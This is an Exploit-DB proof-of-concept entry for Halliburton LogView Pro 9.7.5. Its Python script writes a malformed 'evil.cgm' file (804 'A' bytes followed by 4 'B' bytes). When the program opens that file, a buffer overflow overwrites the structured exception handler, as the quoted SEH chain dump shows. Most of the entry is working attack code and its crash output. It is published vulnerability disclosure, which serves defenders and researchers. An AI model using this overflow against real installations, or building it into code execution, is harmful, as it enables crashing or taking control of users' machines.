Halliburton LogView Pro 9.7.5 - '.cgm' / '.tif' / '.tiff' / '.tifh' Crash (PoC)

EDB-ID:

40192

CVE:

N/A




Platform:

Windows

Date:

2016-08-01


# Exploit Title: [Haliburton LogView Pro v9.7.5]
# Exploit Author: [Karn Ganeshen]
# Download link: [http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe]

# Version: [Current version 9.7.5]
# Tested on: [Windows Vista Ultimate SP2]
#
# Open cgm/tif/tiff/tifh file -> program crash -> SEH overwritten
#
# SEH chain of main thread
# Address SE handler
# 0012D22C kernel32.76B6FEF9
# 0012D8CC 42424242
# 41414141 *** CORRUPT ENTRY ***
#

#!/usr/bin/python

file="evil.cgm"
buffer = "A"*804 + "B"*4

file = open(file, 'w')
file.write(buffer)
file.close()

# +++++